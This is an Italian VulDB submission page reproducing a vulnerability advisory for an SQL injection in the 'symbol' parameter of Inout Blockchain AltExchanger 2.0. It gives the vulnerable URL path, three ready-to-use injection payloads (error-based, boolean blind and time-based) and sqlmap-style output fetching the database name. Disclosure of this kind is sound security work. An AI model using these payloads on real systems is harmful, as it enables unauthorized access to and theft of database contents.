Invia #177561: Inout Blockchain AltExchanger 2.0 - SQL Injectioninformazioni

TitoloInout Blockchain AltExchanger 2.0 - SQL Injection
Descrizione# Exploit Title: Inout Blockchain AltExchanger 2.0 - SQL Injection # Date: 04/07/2023 # Exploit Author: CraCkEr # Vendor: Inout Scripts # Vendor Homepage: https://www.inoutscripts.com/ # Software Link: https://www.inoutscripts.com/products/inout-blockchain-altexchanger/ # Version: 2.0 # Tested on: Windows 10 Pro # Impact: Database Access Release Notes: SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /application/third_party/Chart/TradingView/chart_content/master.php/history https://website/application/third_party/Chart/TradingView/chart_content/master.php/history?symbol=[SQLI]&resolution=5&from=1688226203&to=1688229203 GET parameter 'symbol' is vulnerable to SQL Injection --- Parameter: symbol (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: symbol=ZRX-BTC') AND (SELECT(0)FROM(SELECT COUNT(*),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: symbol=ZRX-BTC') AND 06585=6585 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: symbol=ZRX-BTC'XOR(IF(now()=sysdate(),SLEEP(8),0))XOR'Z&resolution=5&from=1688226203&to=1688229203 --- [+] Starting the Attack fetching current database current database: '*****_blockchain_altexchanger_***' [-] Done
Utente
 skalvin (UID 49463)
Sottomissione04/07/2023 18:01 (3 anni fa)
Moderazione11/07/2023 17:23 (7 days later)
StatoDuplicato
Voce VulDB200588 [Inout Blockchain AltExchanger master.php Simbolo iniezione SQL]
Punti0

Want to stay up to date on a daily basis?

Enable the mail alert feature now!